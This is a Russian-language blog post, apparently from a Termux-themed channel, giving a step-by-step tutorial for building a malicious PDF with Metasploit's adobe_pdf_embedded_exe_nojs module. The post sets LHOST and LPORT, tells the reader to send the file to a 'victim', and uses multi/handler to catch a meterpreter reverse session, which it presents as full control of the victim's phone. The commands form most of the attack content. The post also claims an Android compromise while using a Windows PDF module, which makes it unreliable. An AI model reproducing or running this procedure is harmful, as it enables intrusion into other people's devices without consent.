Добавить в корзинуПозвонить
Найти в Дзене
Termux
38 подписчиков

Как взломать Android смартфон через .PDF файл

906
1 мин
Для проведения данной атаки можно использовать не только компьютер с установленным Linux, но и свой Android смартфон (вам понадобится установить Termux). Сейчас расскажем все подробнее... Вам понадобится: Приложение Termux Установить Metasploit Framework в Termux. Termux должен иметь возможность использовать внешнее хранилище (для этого введите команду: termux-setup-storage). (Рекомендуется, но не обязательно) Установите клавиатуру Hacker's Keyboard для легкого ввода команд в Termux. После того, как вcе описанное выше - выполнено, можно приступать к взлому. Запуск консоли Metasploit Откройте Termux, если используете свой смартфон, или терминал, если используется компьютер с Linux. Введите следующую команду, чтобы открыть консоль Metasploit msfconsole Создание PDF-файла (Полезная нагрузка) Введите команду, приведенную ниже: use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs Затем вы должны настроить Localhost. Для этого вам понадобится ваш IP-адрес, чтобы проверить его тип, вв

Для проведения данной атаки можно использовать не только компьютер с установленным Linux, но и свой Android смартфон (вам понадобится установить Termux).

Сейчас расскажем все подробнее...

Вам понадобится:

Приложение Termux

Установить Metasploit Framework в Termux.

Termux должен иметь возможность использовать внешнее хранилище (для этого введите команду: termux-setup-storage).

(Рекомендуется, но не обязательно) Установите клавиатуру Hacker's Keyboard для легкого ввода команд в Termux.

После того, как вcе описанное выше - выполнено, можно приступать к взлому.

Запуск консоли Metasploit

Откройте Termux, если используете свой смартфон, или терминал, если используется компьютер с Linux.

Введите следующую команду, чтобы открыть консоль Metasploit

msfconsole

Создание PDF-файла (Полезная нагрузка)

Введите команду, приведенную ниже:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Затем вы должны настроить Localhost. Для этого вам понадобится ваш IP-адрес, чтобы проверить его тип, вводите в новом окне session на termux или в другом окне терминала:

ifconfig

Теперь зайдите в свою консоль metasploit и вбейте свой IP следующим образом:

set LHOST 192.168.0.0

Замените IP-адрес, указанный в приведенной выше команде, вашим собственным IP-адресом

Теперь пришло время для настройки порта. Для этого введите следующую команду:

set LPORT 4444

Вы можете использовать любой порт, например 4564, 8080 и т.д.

Далее мы сгенерируем наш PDF файл с помощью команды ниже:

set filename MyDocument.pdf

Вы можете использовать любое имя, которое хотите. Просто подставьте его вместо MyDocument. Не забудьте вписать .pdf в конце его названия.

Закончим процесс создания, введя команду:

exploit

Теперь в течение секунды появится сообщение о том, что ваш PDF-файл создан.

Остается отправить этот файл своей жертве. Как только она его откроет, вы получите сеанс metasploit.

Использование

Сначала откройте консоль metasploit, набрав:

msfconsole

А затем впишите команды:

use exploit/multi/handler/ set LHOST <your_IP> set LPORT 4444 exploit

Убедитесь, что вы ввели тот же IP-адрес и порт, что и выше, во 2-м шаге.

Пройдет немного времени, после чего вы получите сеанс meterpreter.

Поздравляю! Вы получили доступ к смартфону жертвы и можете делать с ним все, что душе угодно.

1